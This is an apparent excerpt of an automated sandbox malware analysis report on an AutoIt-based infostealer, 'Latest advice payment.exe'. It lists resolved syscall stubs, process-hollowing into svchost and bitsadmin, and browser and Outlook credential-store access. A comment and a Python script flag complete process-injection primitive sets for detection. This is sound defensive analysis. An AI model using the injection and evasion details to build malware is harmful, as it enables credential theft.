                Source: Latest advice payment.exe, 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                Source: Latest advice payment.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                Source: initial sample | Static PE information: Filename: Latest advice payment.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042CA93 NtClose
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03474340 NtSetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03474650 NtSuspendThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472BE0 NtQueryValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472BF0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472AD0 NtReadFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472AF0 NtWriteFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472F30 NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472FE0 NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472D10 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472DD0 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472C60 NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472C70 NtFreeVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472CA0 NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03473010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03473090 NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034739B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03473D70 NtOpenThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03473D10 NtOpenProcessToken
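Two things stand out in the Nt* rows above. First, apart from the NtClose wrapper at 0x0042CA93 inside the PE image, every stub sits in one tight range from 0x03472AB0 to 0x03474650, which is what a privately mapped copy of ntdll looks like and is consistent with the report's "Found direct / indirect Syscall" signature and the `OriginalFilename ntdll.dll` strings found in the sample's memory further down. Second, the resolved set covers complete process-injection primitive chains (NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread; NtOpenThread plus NtQueueApcThread; NtCreateSection plus NtMapViewOfSection), which is the basis of the "Writes to foreign memory regions", "Queues an APC in another process" and "Modifies the context of a thread in another process" signatures. The Python below is an added example, not Joe Sandbox code: it parses rows in this format, clusters the stub addresses, and reports which primitive sets are complete. The technique groupings and the MITRE ATT&CK T1055 sub-technique IDs are my own mapping, not something the report states.

```python
import re
from collections import defaultdict

# Constructed input: the 39 "Code function" rows for svchost.exe (process 2) from
# the report above, packed two per line ("; "-separated) so the script runs offline.
ROWS = """
2_2_0042CA93 NtClose; 2_2_03472B60 NtClose,LdrInitializeThunk
2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk; 2_2_034735C0 NtCreateMutant,LdrInitializeThunk
2_2_03474340 NtSetContextThread; 2_2_03474650 NtSuspendThread
2_2_03472BE0 NtQueryValueKey; 2_2_03472BF0 NtAllocateVirtualMemory
2_2_03472B80 NtQueryInformationFile; 2_2_03472BA0 NtEnumerateValueKey
2_2_03472AD0 NtReadFile; 2_2_03472AF0 NtWriteFile
2_2_03472AB0 NtWaitForSingleObject; 2_2_03472F60 NtCreateProcessEx
2_2_03472F30 NtCreateSection; 2_2_03472FE0 NtCreateFile
2_2_03472F90 NtProtectVirtualMemory; 2_2_03472FA0 NtQuerySection
2_2_03472FB0 NtResumeThread; 2_2_03472E30 NtWriteVirtualMemory
2_2_03472EE0 NtQueueApcThread; 2_2_03472E80 NtReadVirtualMemory
2_2_03472EA0 NtAdjustPrivilegesToken; 2_2_03472D00 NtSetInformationFile
2_2_03472D10 NtMapViewOfSection; 2_2_03472D30 NtUnmapViewOfSection
2_2_03472DD0 NtDelayExecution; 2_2_03472DB0 NtEnumerateKey
2_2_03472C60 NtCreateKey; 2_2_03472C70 NtFreeVirtualMemory
2_2_03472C00 NtQueryInformationProcess; 2_2_03472CC0 NtQueryVirtualMemory
2_2_03472CF0 NtOpenProcess; 2_2_03472CA0 NtQueryInformationToken
2_2_03473010 NtOpenDirectoryObject; 2_2_03473090 NtSetValueKey
2_2_034739B0 NtGetContextThread; 2_2_03473D70 NtOpenThread
2_2_03473D10 NtOpenProcessToken
"""

# "<proc>_<n>_<addr> Api,Api[,<proc>_<n>_<addr>]"; search() also tolerates the
# report's "Source: ... | Code function: " prefix.
ROW_RE = re.compile(r"(\d+)_(\d+)_([0-9A-Fa-f]{8})\s+(.+?)\s*$")
ADDR_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8}$")


def parse_rows(text):
    """Return {api: [addresses]} for every API named in the rows."""
    by_api = defaultdict(list)
    for entry in re.split(r"[;\n]", text):
        m = ROW_RE.search(entry)
        if not m:
            continue
        addr = int(m.group(3), 16)
        for api in m.group(4).split(","):
            api = api.strip()
            if api and not ADDR_RE.match(api):  # skip the report's trailing anchor
                by_api[api].append(addr)
    return dict(by_api)


# Primitive sets per injection technique. Assumption: my mapping of the report's
# injection signatures onto ATT&CK T1055 sub-techniques; tune to your own content.
TECHNIQUES = {
    "T1055.012 process hollowing": {"NtCreateProcessEx", "NtUnmapViewOfSection",
                                    "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"},
    "T1055.004 APC injection": {"NtOpenThread", "NtQueueApcThread"},
    "T1055.003 thread execution hijacking": {"NtSuspendThread", "NtGetContextThread",
                                             "NtSetContextThread", "NtResumeThread"},
    "section mapping into a remote process": {"NtCreateSection", "NtMapViewOfSection", "NtOpenProcess"},
}


def matched_techniques(by_api):
    """Techniques whose every primitive is resolved in the process."""
    apis = set(by_api)
    return sorted(name for name, need in TECHNIQUES.items() if need <= apis)


def stub_clusters(by_api, gap=0x1000):
    """Group Nt* addresses lying within `gap` bytes of each other as (start, end, count).
    One dense cluster away from the 0x00400000 image is the footprint of a privately
    mapped ntdll copy used for direct syscalls."""
    addrs = sorted({a for api, alist in by_api.items() if api.startswith("Nt") for a in alist})
    clusters = []
    for a in addrs:
        if clusters and a - clusters[-1][1] <= gap:
            clusters[-1][1], clusters[-1][2] = a, clusters[-1][2] + 1
        else:
            clusters.append([a, a, 1])
    return [tuple(c) for c in clusters]


if __name__ == "__main__":
    by_api = parse_rows(ROWS)
    for start, end, n in stub_clusters(by_api):
        print(f"{n:3d} Nt* stubs in 0x{start:08X}-0x{end:08X}")
    print("complete primitive sets:", matched_techniques(by_api))
```

For this sample the script reports one lone address in the image and one cluster of 38 stubs in the 0x0347xxxx region, and all four primitive sets are complete; on a benign process you would expect the Nt* stubs to resolve inside the loaded ntdll.dll range instead, which is the check an EDR performs when it looks for manually mapped copies of ntdll.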
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CA1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005B8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005C51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code functions (34, prefix 0_2_): 0058D975, 0056FCE0, 005821C5, 005962D2, 005E03DA, 0059242E, 005825FA, 005BE616, 005766E1, 0056E6A0,
                    0059878F, 005E0857, 00596844, 00578808, 005C8889, 0058CB21, 00596DB6, 00576F9E, 00573030, 0058F1D9,
                    00583187, 00561287, 00581484, 00575520, 00587696, 00575760, 00581978, 00599AB5, 005E7DDB, 00581D90,
                    0058BDA6, 0056DF00, 00573FE0, 010A59B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code functions (118, prefix 2_2_): 00418993, 00401ACB, 0042F0B3, 004101D3, 004032F0, 00402A90, 0040E3D3, 004103F3, 00416B8E, 00416B93,
                    00401C40, 00401C3A, 0040E51C, 0040E523, 00402E49, 00402E50, 00402F19, 00402720, 034FA352, 0344E3F0,
                    035003E6, 034E0274, 034C02C0, 034C8158, 03430100, 034DA118, 034F81CC, 034F41A2, 035001AA, 034D2000,
                    03464750, 03440770, 0343C7C0, 0345C6E0, 03440535, 03500591, 034F2446, 034E4420, 034EE4F6, 034FAB40,
                    034F6BD7, 0343EA80, 03456962, 034429A0, 0350A9A6, 0344A840, 03442840, 0346E8F0, 034268B8, 034B4F40,
                    03482F28, 03460F30, 034E2F30, 03432FC8, 0344CFE0, 034BEFA0, 03440E59, 034FEE26, 034FEEDB, 03452E90,
                    034FCE93, 0344AD00, 034DCD1F, 0343ADE0, 03458DBF, 03440C00, 03430CF2, 034E0CB5, 0342D34C, 034F132D,
                    0348739A, 0345B2C0, 034E12ED, 034452A0, 0347516C, 0342F172, 0350B16B, 0344B1B0, 034EF0CC, 034470C0,
                    034F70E9, 034FF0E0, 034FF7B0, 03485630, 034F16CC, 034F7571, 035095C3, 034DD5B0, 03431460, 034FF43F,
                    034FFB76, 034B5BF0, 0347DBF9, 0345FB80, 034FFA49, 034F7A46, 034B3A6C, 034EDAC6, 034DDAAC, 03485AA0,
                    034E1AA3, 03449950, 0345B950, 034D5910, 034AD800, 034438E0, 034FFF09, 03403FD2, 03403FD5, 03441F92,
                    034FFFB1, 03449EB0, 03443D40, 034F1D5A, 034F7D73, 0345FDC0, 034B9C32, 034FFCF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0342B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03475130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03487E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034BF290 appears 105 times
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: String function: 00580AE3 appears 70 times
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: String function: 00567DE1 appears 36 times
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: String function: 00588900 appears 42 times
                Source: Latest advice payment.exe, 00000000.00000003.2141788113.0000000003CBD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Latest advice payment.exe
                Source: Latest advice payment.exe, 00000000.00000003.2141665348.0000000003B13000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Latest advice payment.exe
                Source: Latest advice payment.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@12/9
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CA06A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005B81CB AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005B87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005DEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CC397 CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_00564E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\Latest advice payment.exe | File created: C:\Users\user\AppData\Local\Temp\aut7051.tmp
                Source: Latest advice payment.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: bitsadmin.exe, 00000008.00000003.2622832474.0000000002E64000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2622955906.0000000002E85000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2625530122.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3990678417.0000000002E85000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3990678417.0000000002EB3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Latest advice payment.exe | ReversingLabs: Detection: 47%
                Source: unknown | Process created: C:\Users\user\Desktop\Latest advice payment.exe "C:\Users\user\Desktop\Latest advice payment.exe"
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Latest advice payment.exe"
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Latest advice payment.exe | Static file information: File size 1216000 > 1048576
                Source: Latest advice payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Latest advice payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Latest advice payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Latest advice payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Latest advice payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Latest advice payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CWtKbasqHVKAO.exe, 00000007.00000000.2349023099.000000000065E000.00000002.00000001.01000000.00000005.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000000.2505529018.000000000065E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Latest advice payment.exe, 00000000.00000003.2141005664.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Latest advice payment.exe, 00000000.00000003.2141665348.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2435654501.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2318563646.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2435654501.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2315519432.0000000003000000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2434183200.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.000000000325E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2437972355.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Latest advice payment.exe, 00000000.00000003.2141005664.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Latest advice payment.exe, 00000000.00000003.2141665348.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2435654501.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2318563646.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2435654501.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2315519432.0000000003000000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2434183200.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.000000000325E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2437972355.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp
                Source: Latest advice payment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Latest advice payment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Latest advice payment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Latest advice payment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Latest advice payment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_00564B37 LoadLibraryA,GetProcAddress, 0_2_00564B37
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_0056C4C6 push A30056BAh; retn 0056h 0_2_0056C50D
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_00588945 push ecx; ret 0_2_00588958
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402055 push edx; iretd 2_2_00402056
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004018A1 push edx; iretd 2_2_004018A2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414930 push eax; retf 2_2_00414937
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004181E4 push ds; retf 2_2_004181E7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040218B push ebp; iretd 2_2_00402192
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D9B6 push FFFFFFEBh; iretd 2_2_0040D9BF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041AA30 push edx; retf 2_2_0041AA31
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004192F1 push edx; ret 2_2_004192F2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00425433 push edi; ret 2_2_00425483
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403570 push eax; ret 2_2_00403572
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414658 push esp; ret 2_2_00414659
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414E8B pushfd ; iretd 2_2_00414E91
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040A7C3 push edi; ret 2_2_0040A7F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D7CA push ecx; ret 2_2_0040D7CF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0340225F pushad ; ret 2_2_034027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034027FA pushad ; ret 2_2_034027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx 2_2_034309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0340283D push eax; iretd 2_2_03402858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0340135E push eax; iretd 2_2_03401369
